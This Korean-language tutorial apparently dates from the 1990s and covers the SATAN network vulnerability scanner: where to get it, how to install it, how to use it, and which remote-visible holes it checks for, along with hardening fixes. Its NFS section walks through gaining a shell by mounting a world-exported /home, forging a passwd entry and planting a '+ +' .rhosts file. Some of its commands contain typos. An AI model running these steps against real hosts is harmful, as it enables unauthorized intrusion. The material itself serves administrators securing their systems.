satan

Dan Farmer와 Wietse Venema가 만든 SATAN(System Administrator Tool for Analyzing Netwarks)은 리모트 시스템을 시험한다는 것을 제외하고는 COPS와 그 원리가 같다. 따라서 이 프로그램을 작동시키는 모든 사용자는 다른(others) 시스템의 구멍( vulnerablilty)을 발견할 수 있다 .

외부에서의 시스템 홀의 지적해 주는 도구 satan의 출시로 인하여 많은 시스템의 vulnerablilty 가 드러나게 되었다는 단점도 가지지만, 관리자들에게 자신의 시스템의 홀을 모니터링 해준다는 입장과 저울질 해 보았을 때 긍정적인 측면이 더 크다고 할수 있다.

SATAN은 네트웍을 통하여 리모트 시스템의 보안 정도를 조사하고 그 자료를 데이터베이스에 저장한다. 이 결과를 http프로토콜 을 지원하는 HTML browser를 통하여 쉽게 볼 수 있으며, 호스트의 타입, 서비스, vulnerability등의 보고서를 만들어 낼 수 있다. 기본적으로 SATAN의 실행은 설정 파일(config/satan.cf)에 의하여 제어될 수 있다.

그리고, SATAN은 문제를 발견했을 시에는, 검색기 상에서 그것이 왜 문제가 되는지, 어떻게 하면 문제를 해결할 수 있는지를 관리자에게 알려준며, Hyper link로 연결되어 있는 길을 따라가다 보면 그 문제점에 대한 보안 대책도 알려준다.

다음사항(이하(1~10))들은외부에서 바라본 시스템 홀들이며,이 홀들은 관리자들이 셋업을 확실하게 바꾸는 것에 의해 근절 시킬수 있다).

NFS mount attack
NFS 란 Network File System 의 약자로써 LAN 에 접속되어 있는 컴퓨터들이 File system 을 공동사용할 수 있게 한다. File system 을 export 해주는 시스템을 Server, 그 화일 시스템을 mounting 하여 사용하는 시스템을 client 라 하는데, 문제는 server 측에서 export list 를 잘못 setup 하였을때 나타난다.

어떠한 server 가 누구에게 어느 화일 시스템을 export 하고 있는지는 'showmount' command 를 이용해서 알아 볼수 있다.

[kus:chester] showmount -e baikdu.kaist.ac.kr
export list for baikdu.kaist.ac.kr:
/cdrom kus,kus.kaist.ac.kr
/baikdu sokri.kaist.ac.kr,kus.kaist.ac.kr
/camis wook,mis_pc1,mis_pc2

위와 같이 baikdu 란 호스트는 cdrom baikdu camis 란 file system 을 뒤에 나열되어 있는 TRUSTED HOST 에게 export 한다는 것이다. 즉, 뒤에 나열된 호스트 외엔 그 화일 시스템을 마운팅 하여 사용할수 없다는 것을 나타낸다. 문제는 이러한 화일 시스템을 everyone에게 export 할때 일어난다.

[kus:chester]bshowmount -e target.com
export list for target.com:
/home (everyone)
/usr (everyone)

이러한 경우에는.. /home 을 일단 마운팅해서 그 안늬 유저의 홈디렉토리에 .rhosts 등을 넣어둔후 rlogin 이나 rsh 를 사용 해서 target machine 의 shell 을 쉽게 얻어 낼수 있다.

다음의 예제를 보도록 하자.

kus# showmount -e target.com:/home/mount
kus# ls /mount
chester/ poison/ sakai/ yspace/
kus# ls -al chester
drwxr-xr-x 2 47 3 512 Nov 9 06:13 src/
drwxr-xr-x 3 47 3 512 Nov 29 00:35 sss/
-rw- - -------- 1 47 3 2307 Dec 10 23:28 table
kus# echo "temp::47:3:temporary:/mount/chester:/bin/csh">> /eyc/passwd
kus# su temp // UID matching 을 위해
temp% echo "+ +" .rhosts
temp% exit
kus#
kus# rlogin target.com -1 chester
( Logging in )
chester%
chester% hostname
target

이런식으로 쉽게 쉘을 취하게 된다.. NFS setup 은 시스템의 보안관리의 가장 기본이 된다.
anonymous ftp 의 setup 이 잘못 된 경우
ftp 의 permission 이 666이고 ftp account 가 shell 을 가지고 있도록 셋업을 한 경우에는 아무나 ftp 에 .rhosts 을 만들수 있고 rlogin 이나 ㄱ노 을 통하여 귑게 쉘을 따넬수 있다. 이러한 위험을 피하기 위하여, ftp 를 644 로 바꾸고 /etc/passwd 에서 ftp 의 쉘 entry 를 /bin/false 로 바꾼다.
sendmail 의 hole
OS 를 인스톨할때 기본적으로 따라오는 sendmail 은 mail from 부분에 vertical bar "-"를 이용해서 piping 을 한후 passwd 를 빼내올 수 있다. CERT advisory 가 명시하는 새로운 version 으로 upgrade 한다.
tftp 가 setup 이 잘못되어진 경우
이런 경우 쉽게 /etc/passwd 를 빼올수 있다. 따라서, /etc/inetd.conf 에서 in.tftpd 를 comment out 한다.
/etc/hosts.equiv 가 +로 마크되어 있을때
이러한 경우에도 쉽게 shell 을 얻을 수 있다. OS INTALL 직후에는 default 로 /etc/hosts.equiv 가 + 로 마킹되어 있다. 이 화일을 삭제하고 /dev/null 로 링크해서 race condition 에 대한 attack 에 대비한다.

kus# cd /etc
kus# rm hosts.equiv
kus# ln -s /dev/null hosts.equiv

각 User 의 홈에 있는 .rhosts 를 허용하지 않는다.
한 호스트가 해킹 당하면 .rhosts에 의해서 연속적으로 또한 무방비상태에서 해킹당하는 사태가 흔히 발생한다. 이러한 위험을 막기 위해서는, 시스템에 존재하는 모든 .rhost file을 주기적으로 지우는 방법이 있을 수 있는데, 다음 script 를 crontab 에 넣어서 일정 시간마다 돌린다.

#!/bin/sh
find /home -name '.rhosts' -exec rm -rf {} \;
FTP vulnerabilites
REXD 액세스
r-shell의 접근
제한이 없는 X 서버로의 접근
쓰기권한이 있는 FTP의 홈 디렉토리

satan 구해오기

ftp://ftp.win.tue.nl/pub/security/satan-1.0.tar.Z

ftp://ftp.cert-kr.or.kr/pub/Security/tool/satan-1.1.1.tar.Z

satan의 설치

satan의 인스톨은 매우 쉽다. 하지만 설치하기 전에 다음과 같은 프로그램과 환경이 필요하다.
·Perl 5.000 이상
satan 을 이용하기 위해서는 perl 5.0 버젼 이상이 설치되어 있어야 한다. 가까운 gnu archive 에서 perl5.0 을 가져와 인스톨한 후 satan 인스톨을 시작한다.
·WWW browser(netscape 또는 xmosaic)
·충분한 CPU power와 메모리 32M 이상(많은 data를 원할 때)

satan프로그램과 위의 조건들이 갖추어지면 다음과 같이 설치하면 된다.

우선 satan 의 distribution 화일의 구조를 보면 아래와 같은데 화일중 Perl이 위치한 경로와 WWW browser의 경로를 패치하는 ~~"reconfig" script 를 실행~~한다.
baram# ls -F

Changes bin/ perl/ results/ satan.ps

Makefile* config/ perllib rules/ src/

README html/ reconfig* satan* status_file

TODO include/ repent* satan.8

만일 SATAN이 스스로 WWW browser를 찾아내지 못하게 된다면 config 디렉토리 안의 pasths.pl(즉 config/paths.pl) 을 edit해서 $MOSAIC부분을 수정한다.

$XHOST="/usr/bin/X11/xhost";
$PING="/usr/etc/ping";
$MOSAIC="/usr/local/bin/netscape";//수정할 곳
//형식 $MOSAIC="full path of program_name";
. . . . . . .

위 부분은 system 에 설치된 Web browser 를 지정한다. satan 은 유저와의 대화에 있어서 Web interface 를 이용하므로 한가지 이상의 Web browser 를 가지고 있어야 한다.
사탄의 상위 디렉토리에서 "make" 를 수행하여 system type을 define 한다.

baram3 make
Usage: make system-type. Known type are:
aix sof bad bsdi dgux irix4 irix5 freebad hpux9 linux sunos4 sunos5 sysv4
//자신의 system type을 인자로 넣어준다.지원되는 시스템 타입은 다음과 같다.
aix bsd irix5 freebsd hpux9 linux(untested) sunos4 sunos5 sysv4 ultrix4
*** Error code 1
현재 시스템의 타입을 알아 본다. "uname -a" 그리고 나서 satan 의 필수 부분의 소스를 컴파일(루트권한) 한다. 사탄은 속도를 요구하는 부분은 C로 그리고 나머지는 대부분 perl script 로 만들어져 있다.그리고 대부분의 도큐멘트는 자신이 사용하는 WWW browser에서 모두 접근이 가능한 HTML 문서 형식이므로 자신의 browser내에서 모 든 일을 할 수 있다.

baram# uname -a
SunOS baram 4.1.3-KL 1 sun4c
baram# make sunos4
cd src/misc: make "LIBS=' "XFLAGS=-DAUTH_GID_T=int" "RPCGEN=rpcgen"
cd src/boot; make "libs=" 'XFLAGS=-DAUTH_GID_T=int" "RPCGEN=rpcgen"
'../../bin/boot' is up to date.
cd src/port_scan; make "LIBS=" "XFLAGS=-DAUTH_GID_T=int"
cc -O -DAUTH_GID_T=int -target sun4 -c tcp_scan.c
. . . . . .

이렇게 해서 컴파일이 모두 끝나면 satan 의 setup 은 완료 되었다.

satan의 사용

baram# satan
SATAN is starting up. . . . 라는 메세지 이후 화면에는 우리에게 익숙한 Web browser가 나타날 것이다.
satan은 hyper text의 장점을 십분 활용하고 있다. 어떠한 vulnerability가 감지되면 그에 해당하는 document의 URL을 표시해 준다. 따라서 사용자는 쉽게 정보를 가져올 수 있다.

satan을 아무 인자 없이 실행 시키면 WWW browser가 실행되면서 모든 일을 그 browser내에서 할 수 있게 된다. WWW browser를 인터페이스로 이용하기 때문에 별다른 실행은 하지 않겠다. 이용 방법은 WWW를 이용하는 것과 비슷하다. 도큐먼트도 browser내에 서 HTML 문서 형식으로 볼 수 있으므로 도큐먼트를 보면서 차근차근 실행해 보면 된다.

SATAN Data Management
SATAN Target selection
SATAN Reporting & Data Analysis
SATAN Configuration Management
SATAN Documentation
SATAN Troubleshooting

satan을사용할 때 주의할 것은 TCP wraper등을 구동하고 있다면 wrapper를 모두 disable 한 후에 사탄을 구동해야 한다는 것이다. wrapper로 인하여 port scanning결과를 받아 볼 수 없는 사태가 생기기도 하기 때문이다.

Changes	bin/	perl/	results/	satan.ps
Makefile*	config/	perllib	rules/	src/
README	html/	reconfig*	satan*	status_file
TODO	include/	repent*	satan.8